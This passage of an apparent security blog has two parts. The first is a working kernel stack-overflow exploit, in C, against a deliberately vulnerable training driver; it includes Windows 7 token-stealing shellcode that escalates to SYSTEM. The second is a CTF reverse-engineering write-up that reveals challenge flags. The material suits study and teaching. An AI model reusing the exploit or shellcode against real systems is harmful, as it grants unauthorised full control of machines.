DWORD WINAPI StackOverflowThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;
    PVOID MemoryAddress = NULL;
    PULONG UserModeBuffer = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    PVOID EopPayload = &TokenStealingPayloadWin7; // shellcode
    SIZE_T UserModeBufferSize = (BUFFER_SIZE + RET_OVERWRITE) * sizeof(ULONG);

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
        DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");

        UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
                                           HEAP_ZERO_MEMORY,
                                           UserModeBufferSize);

        if (!UserModeBuffer) {
            DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
        }

        DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");

        RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);

        MemoryAddress = (PVOID)(((ULONG)UserModeBuffer + UserModeBufferSize) - sizeof(ULONG));
        *(PULONG)MemoryAddress = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] RET Value: 0x%p\n", *(PULONG)MemoryAddress);
        DEBUG_INFO("\t\t\t[+] RET Address: 0x%p\n", MemoryAddress);
        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Kernel Stack Overflow\n");

        OutputDebugString("****************Kernel Mode****************\n");

        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_STACK_OVERFLOW,
                        (LPVOID)UserModeBuffer,
                        (DWORD)UserModeBufferSize,
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");

        HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);
        UserModeBuffer = NULL;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
</code></pre>
<h3 id="shellcode">Shellcode</h3>
<ul>
<li>On Win 7, <code class="highlighter-rouge">FS:[0x124]</code> points to the <code class="highlighter-rouge">KTHREAD</code> of the current process</li>
</ul>
<p><img src="https://i.imgur.com/aGbWKxm.png" alt="" /></p>
<ul>
<li>What <code class="highlighter-rouge">GS</code> and <code class="highlighter-rouge">FS</code> are used for is decided by the OS kernel; on Windows, <code class="highlighter-rouge">FS</code> points to a number of structures</li>
<li>Diagram of the <code class="highlighter-rouge">ETHREAD</code> and <code class="highlighter-rouge">EPROCESS</code> structures</li>
</ul>
<p><img src="https://i.imgur.com/FVy7m0t.jpg" alt="" /></p>
<ul>
<li>Because the function's return address has been replaced with our shellcode, the shellcode cannot return to the original, correct location when it finishes; for execution to continue, esp has to be adjusted</li>
</ul>
<pre><code class="language-clike">VOID TokenStealingPayloadWin7() {
    // Importance of Kernel Recovery
    __asm {
        pushad                              ; Save registers state
                                            ; save the current register state; it is restored at the end

        ; Start of Token Stealing Stub
        xor eax, eax                        ; Set ZERO
        mov eax, fs:[eax + KTHREAD_OFFSET]  ; Get nt!_KPCR.PcrbData.CurrentThread
                                            ; _KTHREAD is located at FS:[0x124]
                                            ; load the current process's KTHREAD into eax
        mov eax, [eax + EPROCESS_OFFSET]    ; Get nt!_KTHREAD.ApcState.Process
                                            ; load [current KTHREAD + EPROCESS_OFFSET] into eax
        mov ecx, eax                        ; Copy current process _EPROCESS structure
                                            ; keep the current process's EPROCESS in ecx
        mov edx, SYSTEM_PID                 ; WIN 7 SP1 SYSTEM process PID = 0x4

    SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET]       ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
                                            ; walk ActiveProcessLinks from the current EPROCESS to find the System EPROCESS
        sub eax, FLINK_OFFSET               ; Flink points to the next EPROCESS's ActiveProcessLinks field (not its start),
                                            ; so subtract FLINK_OFFSET to get back to the start of the next EPROCESS
        cmp [eax + PID_OFFSET], edx         ; Get nt!_EPROCESS.UniqueProcessId
                                            ; compare nt!_EPROCESS.UniqueProcessId with 4
        jne SearchSystemPID                 ; if it is not 4, keep searching; on leaving the loop it is certainly 4

        mov edx, [eax + TOKEN_OFFSET]       ; Get SYSTEM process nt!_EPROCESS.Token
                                            ; edx now holds the System token
        mov [ecx + TOKEN_OFFSET], edx       ; Replace target process nt!_EPROCESS.Token
                                            ; with SYSTEM process nt!_EPROCESS.Token
                                            ; replace the current process's token with the System token
        ; End of Token Stealing Stub

        popad                               ; Restore registers state

        ; Kernel Recovery Stub
        xor eax, eax                        ; Set NTSTATUS SUCCESS
        add esp, 12                         ; Fix the stack
        pop ebp                             ; Restore saved EBP
        ret 8                               ; Return cleanly
    }
}
</code></pre>
<h3 id="result">Result</h3>
<p>Open cmd.exe and run <code class="highlighter-rouge">whoami</code> to see the current privileges</p>
<p><img src="https://i.imgur.com/8dXeTWf.png" alt="" /></p>
<p>Run the exploit code</p>
<p><img src="https://i.imgur.com/uEdzuZG.png" alt="" /></p>
<p>Open cmd.exe again and run <code class="highlighter-rouge">whoami</code> to check the current privileges</p>
<p><img src="https://i.imgur.com/oBqLnbi.png" alt="" /></p>
<h3 id="resources">Resources</h3>
<ul>
<li><a href="http://www.codemachine.com/article_kernelstruct.html">codemachine - Windows kernel data structures</a></li>
<li><a href="http://www.codemachine.com/article_kernelstruct.html">McDermott - x64 Kernel Privilege Escalation</a></li>
<li><a href="https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives">coresecurity - Abusing GDI for ring0 exploit primitives</a></li>
<li><a href="http://www.fuzzysecurity.com/tutorials/expDev/14.html">fuzzysecurity - Kernel Exploitation Stack Overflow</a></li>
<li><a href="http://www.mista.nu/research/MANDT-kernelpool-PAPER.pdf">Tarjei Mandt - Kernel Pool Exploitation on Windows 7</a></li>
<li><a href="http://magazine.hitb.org/issues/HITB-Ezine-Issue-003.pdf">j00ru - Reserve Objects in Windows 7</a></li>
</ul>
2017 HITCON CMT mini wargame Reverse
2017-08-26T00:00:00+00:00
http://0x00.tw/2017/08/26/2017 HITCON CMT mini wargame
<p>This year HITCON once again ran a wargame during the HITCON CMT conference, similar to those of previous years; compared with HITCON CTF it is a simpler, small-scale competition. I was lucky to team up with friends from Israel: since I am Lazy and they are Hackers, the team was named <code class="highlighter-rouge">Lazyhacker</code>. My job in the team was the Reverse challenges. There were only two this time, both Windows binaries, a calculator and a minesweeper; they were quite fun, so I wanted to write them up.</p>
<hr />
<h2 id="100-calcexe">[100] calc.exe</h2>
<h3 id="題目描述">Challenge description</h3>
<p>Nothing unusual happens; it is just a calculator that calculates.</p>
<p><img src="https://i.imgur.com/DMo6dMi.png" alt="" /></p>
<h3 id="解法">Solution</h3>
<p>It looked exactly like the Windows calculator, so I took the original Windows <code class="highlighter-rouge">calc.exe</code> executable and diffed the two (here with <code class="highlighter-rouge">vimdiff</code>), which revealed some suspicious-looking extra code</p>
<p><img src="https://i.imgur.com/6NRAkp5.png" alt="" /></p>
<p>Loading it into IDA Pro and analysing <code class="highlighter-rouge">sub_10136B0()</code> (you can search for the opcodes or compute the offset) shows that it performs some kind of string comparison</p>
<p><img src="https://i.imgur.com/NAUhSNt.png" alt="" /></p>
<p>In short, it obtains the <code class="highlighter-rouge">HWND</code> of the number field, reads the text shown in it, and verifies that text</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>char buf[256];
HWND hwnd = GetDlgItem(g_hWnd, 403); // 403 is the control ID of the number field
GetWindowTextA(hwnd, buf, 256);
// verify the text in buf
</code></pre></div></div>
<p>[Note] Control IDs can be viewed with Resource Hacker
<img src="https://i.imgur.com/VPDAWFP.png" alt="" /></p>
<p>You can also trace it with OllyDbg to understand the program's behaviour. Tracing shows that pressing <code class="highlighter-rouge">=</code> jumps into this patched code. As for which number makes the FLAG appear: break at <code class="highlighter-rouge">101371A</code> and watch how it compares; the values compared are <code class="highlighter-rouge">0x31323035</code>, <code class="highlighter-rouge">0x32303536</code>, <code class="highlighter-rouge">0x352E3631</code> and <code class="highlighter-rouge">0x36313230</code></p>
<p><img src="https://i.imgur.com/jl2IAu6.png" alt="" /></p>
<p>Looking these up in the ASCII table and accounting for little endian gives <code class="highlighter-rouge">5021650216.50216</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x31323035 --> 5021
0x32303536 --> 6502
0x352E3631 --> 16.5
0x36313230 --> 0216
</code></pre></div></div>
<p>It can also be recovered from IDA Pro; the comparison part is
<img src="https://i.imgur.com/kQuEkdy.png" alt="" /></p>
<p>So just type <code class="highlighter-rouge">5021650216.50216</code> into the window and press <code class="highlighter-rouge">=</code>
<img src="https://i.imgur.com/7qEETTe.png" alt="" /></p>
<p>and a small box pops up showing the flag
<img src="https://i.imgur.com/QTbNeYZ.png" alt="" />
<code class="highlighter-rouge">The flag is: hitcon{50216_is_our_god}</code></p>
<h2 id="200-winmineexe">[200] winmine.exe</h2>
<h3 id="題目描述-1">Challenge description</h3>
<p>An unusual minesweeper: it opens as a 40*40 board, and apart from certain positions every cell is a mine</p>
<p><img src="https://i.imgur.com/f4v3lfE.png" alt="" />
<img src="https://i.imgur.com/PbyCTrV.png" alt="" /></p>
<h3 id="解法-1">Solution</h3>
<p>It is a minesweeper game; after running it I was lucky enough to hit the correct positions a few times</p>
<p><img src="https://i.imgur.com/16XPA2L.jpg" alt="" />
<img src="https://i.imgur.com/jmsMbVy.jpg" alt="" /></p>
<p>I guessed that the shapes appearing at the correct positions might be the whole FLAG, in order (something like <code class="highlighter-rouge">THE flag is hitcon{xxx}</code>), so I hoped to find where they are stored in IDA Pro</p>
<p>In <code class="highlighter-rouge">sub_962880()</code> there is <code class="highlighter-rouge">MessageBoxA(0, "Are u a hacker O_o?", "O_o?", 0x20u);</code>, so I guessed the flag verification was somewhere nearby</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.text:009629E1 loc_9629E1: ; CODE XREF: sub_962880+12Dj
.text:009629E1 mov ebx, ds:GetTickCount
.text:009629E7 add edi, 0FFFFFFFDh
.text:009629EA call ebx ; GetTickCount
.text:009629EC xor edx, edx
.text:009629EE mov ecx, 0FFh
.text:009629F3 div ecx
.text:009629F5 mov esi, edx
.text:009629F7 call sub_965797
.text:009629FC add eax, esi
.text:009629FE xor edx, edx
.text:00962A00 div edi
.text:00962A02 lea esi, [edx+1]
.text:00962A05 call ebx ; GetTickCount
.text:00962A07 call sub_965797
.text:00962A0C mov ecx, g_check
.text:00962A12 mov edx, 5
.text:00962A17 shl ecx, 4
.text:00962A1A sub ecx, g_check
.text:00962A20 imul eax, esi, 65h
.text:00962A23 add ecx, offset g_enc
.text:00962A29 add eax, offset unk_9775E1
.text:00962A2E xchg ax, ax
.text:00962A30
</code></pre></div></div>
<p>Finally, following the reference at <code class="highlighter-rouge">0x00962A23</code> over to <code class="highlighter-rouge">0x00973BD9</code> shows this</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.rdata:00973BD8 db 1
.rdata:00973BD9 g_enc db 1 ; DATA XREF: sub_962880+1A3o
.rdata:00973BDA db 1
.rdata:00973BDB db 0
.rdata:00973BDC db 1
.rdata:00973BDD db 0
.rdata:00973BDE db 0
.rdata:00973BDF db 1
.rdata:00973BE0 db 0
.rdata:00973BE1 db 0
.rdata:00973BE2 db 1
.rdata:00973BE3 db 0
.rdata:00973BE4 db 0
.rdata:00973BE5 db 1
.rdata:00973BE6 db 0
.rdata:00973BE7 db 1
.rdata:00973BE8 db 0
.rdata:00973BE9 db 1
.rdata:00973BEA db 1
.rdata:00973BEB db 0
.rdata:00973BEC db 1
.rdata:00973BED db 1
.rdata:00973BEE db 1
.rdata:00973BEF db 1
.rdata:00973BF0 db 1
.rdata:00973BF1 db 0
.rdata:00973BF2 db 1
.rdata:00973BF3 db 1
.rdata:00973BF4 db 0
.rdata:00973BF5 db 1
.rdata:00973BF6 db 1
.rdata:00973BF7 db 1
.rdata:00973BF8 db 1
.rdata:00973BF9 db 1
.rdata:00973BFA db 0
.rdata:00973BFB db 0
.rdata:00973BFC db 1
.rdata:00973BFD db 1
.rdata:00973BFE db 1
.rdata:00973BFF db 1
.rdata:00973C00 db 0
.rdata:00973C01 db 0
.rdata:00973C02 db 1
.rdata:00973C03 db 1
.rdata:00973C04 db 1
.rdata:00973C05 db 1
.rdata:00973C06 db 1
.rdata:00973C07 db 1
.rdata:00973C08 db 1
.rdata:00973C09 db 0
.rdata:00973C0A db 0
.rdata:00973C0B db 1
.rdata:00973C0C db 1
.rdata:00973C0D db 1
.rdata:00973C0E db 1
.rdata:00973C0F db 0
.rdata:00973C10 db 0
.rdata:00973C11 db 1
.rdata:00973C12 db 0
.rdata:00973C13 db 0
.rdata:00973C14 db 1
.rdata:00973C15 db 0
.rdata:00973C16 db 0
.rdata:00973C17 db 1
.rdata:00973C18 db 0
.rdata:00973C19 db 0
.rdata:00973C1A db 1
.rdata:00973C1B db 0
.rdata:00973C1C db 0
.rdata:00973C1D db 1
.rdata:00973C1E db 0
.rdata:00973C1F db 0
.rdata:00973C20 db 1
.rdata:00973C21 db 1
.rdata:00973C22 db 1
.rdata:00973C23 db 1
.rdata:00973C24 db 1
.rdata:00973C25 db 1
.rdata:00973C26 db 1
.rdata:00973C27 db 0
.rdata:00973C28 db 1
.rdata:00973C29 db 1
.rdata:00973C2A db 1
.rdata:00973C2B db 1
.rdata:00973C2C db 1
.rdata:00973C2D db 0
.rdata:00973C2E db 1
.rdata:00973C2F db 1
.rdata:00973C30 db 0
.rdata:00973C31 db 1
.rdata:00973C32 db 1
.rdata:00973C33 db 1
.rdata:00973C34 db 1
.rdata:00973C35 db 1
.rdata:00973C36 db 0
.rdata:00973C37 db 0
.rdata:00973C38 db 1
.rdata:00973C39 db 0
.rdata:00973C3A db 1
.rdata:00973C3B db 1
.rdata:00973C3C db 0
.rdata:00973C3D db 1
.rdata:00973C3E db 1
.rdata:00973C3F db 1
.rdata:00973C40 db 1
.rdata:00973C41 db 1
.rdata:00973C42 db 1
.rdata:00973C43 db 1
.rdata:00973C44 db 0
.rdata:00973C45 db 1
.rdata:00973C46 db 0
.rdata:00973C47 db 0
.rdata:00973C48 db 1
.rdata:00973C49 db 0
.rdata:00973C4A db 0
.rdata:00973C4B db 1
.rdata:00973C4C db 0
.rdata:00973C4D db 1
.rdata:00973C4E db 1
.rdata:00973C4F db 1
.rdata:00973C50 db 1
.rdata:00973C51 db 1
.rdata:00973C52 db 1
.rdata:00973C53 db 1
.rdata:00973C54 db 0
.rdata:00973C55 db 0
.rdata:00973C56 db 1
.rdata:00973C57 db 1
.rdata:00973C58 db 1
.rdata:00973C59 db 0
.rdata:00973C5A db 0
.rdata:00973C5B db 1
.rdata:00973C5C db 1
.rdata:00973C5D db 1
.rdata:00973C5E db 1
.rdata:00973C5F db 1
.rdata:00973C60 db 0
.rdata:00973C61 db 0
.rdata:00973C62 db 1
.rdata:00973C63 db 0
.rdata:00973C64 db 0
.rdata:00973C65 db 1
.rdata:00973C66 db 1
.rdata:00973C67 db 1
.rdata:00973C68 db 1
.rdata:00973C69 db 0
.rdata:00973C6A db 1
.rdata:00973C6B db 1
.rdata:00973C6C db 0
.rdata:00973C6D db 1
.rdata:00973C6E db 0
.rdata:00973C6F db 0
.rdata:00973C70 db 0
.rdata:00973C71 db 0
.rdata:00973C72 db 1
.rdata:00973C73 db 0
.rdata:00973C74 db 0
.rdata:00973C75 db 0
.rdata:00973C76 db 0
.rdata:00973C77 db 0
.rdata:00973C78 db 1
.rdata:00973C79 db 0
.rdata:00973C7A db 0
.rdata:00973C7B db 1
.rdata:00973C7C db 0
.rdata:00973C7D db 0
.rdata:00973C7E db 0
.rdata:00973C7F db 0
.rdata:00973C80 db 0
.rdata:00973C81 db 1
.rdata:00973C82 db 0
.rdata:00973C83 db 1
.rdata:00973C84 db 1
.rdata:00973C85 db 1
.rdata:00973C86 db 0
.rdata:00973C87 db 1
.rdata:00973C88 db 0
.rdata:00973C89 db 0
.rdata:00973C8A db 1
.rdata:00973C8B db 0
.rdata:00973C8C db 0
.rdata:00973C8D db 0
.rdata:00973C8E db 0
.rdata:00973C8F db 0
.rdata:00973C90 db 0
.rdata:00973C91 db 0
.rdata:00973C92 db 1
.rdata:00973C93 db 1
.rdata:00973C94 db 1
.rdata:00973C95 db 1
.rdata:00973C96 db 0
.rdata:00973C97 db 0
.rdata:00973C98 db 1
.rdata:00973C99 db 1
.rdata:00973C9A db 1
.rdata:00973C9B db 0
.rdata:00973C9C db 0
.rdata:00973C9D db 0
.rdata:00973C9E db 0
.rdata:00973C9F db 0
.rdata:00973CA0 db 0
.rdata:00973CA1 db 1
.rdata:00973CA2 db 1
.rdata:00973CA3 db 1
.rdata:00973CA4 db 1
.rdata:00973CA5 db 0
.rdata:00973CA6 db 1
.rdata:00973CA7 db 1
.rdata:00973CA8 db 1
.rdata:00973CA9 db 1
.rdata:00973CAA db 0
.rdata:00973CAB db 0
.rdata:00973CAC db 0
.rdata:00973CAD db 0
.rdata:00973CAE db 0
.rdata:00973CAF db 0
.rdata:00973CB0 db 1
.rdata:00973CB1 db 1
.rdata:00973CB2 db 0
.rdata:00973CB3 db 1
.rdata:00973CB4 db 0
.rdata:00973CB5 db 1
.rdata:00973CB6 db 1
.rdata:00973CB7 db 0
.rdata:00973CB8 db 1
.rdata:00973CB9 db 0
.rdata:00973CBA db 1
.rdata:00973CBB db 1
.rdata:00973CBC db 0
.rdata:00973CBD db 1
.rdata:00973CBE db 0
.rdata:00973CBF db 1
.rdata:00973CC0 db 1
.rdata:00973CC1 db 0
.rdata:00973CC2 db 0
.rdata:00973CC3 db 1
.rdata:00973CC4 db 0
.rdata:00973CC5 db 0
.rdata:00973CC6 db 1
.rdata:00973CC7 db 1
.rdata:00973CC8 db 1
.rdata:00973CC9 db 1
.rdata:00973CCA db 0
.rdata:00973CCB db 1
.rdata:00973CCC db 0
.rdata:00973CCD db 1
.rdata:00973CCE db 1
.rdata:00973CCF db 1
.rdata:00973CD0 db 1
.rdata:00973CD1 db 1
.rdata:00973CD2 db 0
.rdata:00973CD3 db 1
.rdata:00973CD4 db 1
.rdata:00973CD5 db 1
.rdata:00973CD6 db 1
.rdata:00973CD7 db 1
.rdata:00973CD8 db 1
.rdata:00973CD9 db 1
.rdata:00973CDA db 1
.rdata:00973CDB db 0
.rdata:00973CDC db 1
.rdata:00973CDD db 1
.rdata:00973CDE db 0
.rdata:00973CDF db 1
.rdata:00973CE0 db 1
.rdata:00973CE1 db 0
.rdata:00973CE2 db 1
.rdata:00973CE3 db 1
.rdata:00973CE4 db 1
.rdata:00973CE5 db 1
.rdata:00973CE6 db 1
.rdata:00973CE7 db 1
.rdata:00973CE8 db 1
.rdata:00973CE9 db 1
.rdata:00973CEA db 0
.rdata:00973CEB db 1
.rdata:00973CEC db 1
.rdata:00973CED db 0
.rdata:00973CEE db 1
.rdata:00973CEF db 1
.rdata:00973CF0 db 0
.rdata:00973CF1 db 1
.rdata:00973CF2 db 1
.rdata:00973CF3 db 1
.rdata:00973CF4 db 1
.rdata:00973CF5 db 1
.rdata:00973CF6 db 0
.rdata:00973CF7 db 1
.rdata:00973CF8 db 1
.rdata:00973CF9 db 1
.rdata:00973CFA db 1
.rdata:00973CFB db 1
.rdata:00973CFC db 0
.rdata:00973CFD db 1
.rdata:00973CFE db 1
.rdata:00973CFF db 0
.rdata:00973D00 db 1
.rdata:00973D01 db 1
.rdata:00973D02 db 0
.rdata:00973D03 db 1
.rdata:00973D04 db 0
.rdata:00973D05 db 1
.rdata:00973D06 db 0
.rdata:00973D07 db 0
.rdata:00973D08 db 1
.rdata:00973D09 db 0
.rdata:00973D0A db 0
.rdata:00973D0B db 1
.rdata:00973D0C db 0
.rdata:00973D0D db 0
.rdata:00973D0E db 0
.rdata:00973D0F db 0
.rdata:00973D10 db 0
.rdata:00973D11 db 1
.rdata:00973D12 db 0
.rdata:00973D13 db 1
.rdata:00973D14 db 1
.rdata:00973D15 db 0
.rdata:00973D16 db 0
.rdata:00973D17 db 1
.rdata:00973D18 db 0
.rdata:00973D19 db 0
.rdata:00973D1A db 1
.rdata:00973D1B db 1
.rdata:00973D1C db 0
.rdata:00973D1D db 1
.rdata:00973D1E db 0
.rdata:00973D1F db 1
.rdata:00973D20 db 1
.rdata:00973D21 db 0
.rdata:00973D22 db 0
.rdata:00973D23 db 0
</code></pre></div></div>
<p>Taking every 15 bytes as one character, laid out 3 per row, the first character comes out as</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>111
010
010
010
010
</code></pre></div></div>
<p>which looks like <code class="highlighter-rouge">T</code>; decoding all 22 characters gives <code class="highlighter-rouge">THE FLAG is hitcon{BOOM!}</code></p>
<p>Had the challenge author XORed these bytes it would have been much harder. Phew.</p>
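<p>To automate the manual decoding above, here is an added example (not from the write-up or from the challenge) that renders the byte array as 3x5 glyphs and looks each one up in a small font table. The sample data is the first 60 bytes of the dump, copied starting at the <code class="highlighter-rouge">.rdata:00973BD8</code> byte just before the <code class="highlighter-rouge">g_enc</code> label, which is where the first <code class="highlighter-rouge">T</code> lines up; the four-entry font table was constructed from those very glyphs, so any other character renders as <code class="highlighter-rouge">?</code>.</p>

```c
#include <stdio.h>
#include <string.h>

#define GLYPH_COLS 3
#define GLYPH_ROWS 5
#define GLYPH_BITS (GLYPH_COLS * GLYPH_ROWS)

/* First 60 bytes of the dump, starting at .rdata:00973BD8 (one byte before the
 * g_enc label); one byte per pixel, row-major, three pixels per row. */
static const unsigned char g_enc_sample[] = {
    1,1,1, 0,1,0, 0,1,0, 0,1,0, 0,1,0,
    1,0,1, 1,0,1, 1,1,1, 1,0,1, 1,0,1,
    1,1,1, 1,0,0, 1,1,1, 1,0,0, 1,1,1,
    1,1,1, 1,0,0, 1,1,1, 1,0,0, 1,0,0,
};

/* Font table constructed for this example from the glyphs in the sample; the
 * challenge binary's complete font is not on the page. */
static const struct { const char *rows[GLYPH_ROWS]; char ch; } font[] = {
    {{"111", "010", "010", "010", "010"}, 'T'},
    {{"101", "101", "111", "101", "101"}, 'H'},
    {{"111", "100", "111", "100", "111"}, 'E'},
    {{"111", "100", "111", "100", "100"}, 'F'},
};

/* Render glyph number `index` into `out` as GLYPH_ROWS strings of '1'/'0'.
 * Returns 0, or -1 when `bits` does not contain that glyph completely. */
int render_glyph(const unsigned char *bits, size_t nbytes, size_t index,
                 char out[GLYPH_ROWS][GLYPH_COLS + 1]) {
    if ((index + 1) * GLYPH_BITS > nbytes)
        return -1;
    const unsigned char *g = bits + index * GLYPH_BITS;
    for (int r = 0; r < GLYPH_ROWS; r++) {
        for (int c = 0; c < GLYPH_COLS; c++)
            out[r][c] = g[r * GLYPH_COLS + c] ? '1' : '0';
        out[r][GLYPH_COLS] = '\0';
    }
    return 0;
}

/* Map a rendered glyph to a character through the font table; '?' if unknown. */
char recognise_glyph(char rows[GLYPH_ROWS][GLYPH_COLS + 1]) {
    for (size_t i = 0; i < sizeof font / sizeof font[0]; i++) {
        int match = 1;
        for (int r = 0; r < GLYPH_ROWS && match; r++)
            match = (strcmp(rows[r], font[i].rows[r]) == 0);
        if (match)
            return font[i].ch;
    }
    return '?';
}

/* Decode every complete glyph in `bits` into the NUL-terminated string `out`.
 * Returns the number of glyphs decoded. */
size_t decode_glyphs(const unsigned char *bits, size_t nbytes, char *out, size_t outlen) {
    char rows[GLYPH_ROWS][GLYPH_COLS + 1];
    size_t n = nbytes / GLYPH_BITS, i;
    for (i = 0; i < n && i + 1 < outlen; i++) {
        render_glyph(bits, nbytes, i, rows);
        out[i] = recognise_glyph(rows);
    }
    out[i] = '\0';
    return i;
}

/* Row `r` of glyph `index` from the sample, e.g. demo_sample_row(0, 0) is "111";
 * an empty string for a glyph or row that does not exist. */
const char *demo_sample_row(size_t index, int r) {
    static char rows[GLYPH_ROWS][GLYPH_COLS + 1];
    if (r < 0 || r >= GLYPH_ROWS ||
        render_glyph(g_enc_sample, sizeof g_enc_sample, index, rows) != 0)
        return "";
    return rows[r];
}

/* The whole sample decoded as text. */
const char *demo_decode_sample(void) {
    static char text[16];
    decode_glyphs(g_enc_sample, sizeof g_enc_sample, text, sizeof text);
    return text;
}

int main(void) {
    char rows[GLYPH_ROWS][GLYPH_COLS + 1];
    size_t n = sizeof g_enc_sample / GLYPH_BITS;
    for (size_t i = 0; i < n; i++) {
        render_glyph(g_enc_sample, sizeof g_enc_sample, i, rows);
        for (int r = 0; r < GLYPH_ROWS; r++)
            printf("%s\n", rows[r]);
        printf("-> %c\n\n", recognise_glyph(rows));
    }
    printf("decoded: %s\n", demo_decode_sample());
    return 0;
}
```

<p>Running it prints the four bitmaps with their letters and then <code class="highlighter-rouge">decoded: THEF</code>. Extending the font table to the remaining characters, or simply reading the printed bitmaps, recovers the rest of the text without guessing cells in the game.</p>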
<hr />
<p>In the end we took first place. Thanks to Lazyhacker, the HITCON CMT organising team, the mini wargame challenge authors, and everyone who has helped me</p>
<p>Postscript: afterwards I chatted with <code class="highlighter-rouge">d3vc0r3</code> and learned that a web penetration testing expert's approach to the Reverse challenge <code class="highlighter-rouge">winmine.exe</code> was rather adorable: every time a character was guessed correctly, take a VMware snapshot, so the next character could be guessed happily and at leisure. Truly wise XD</p>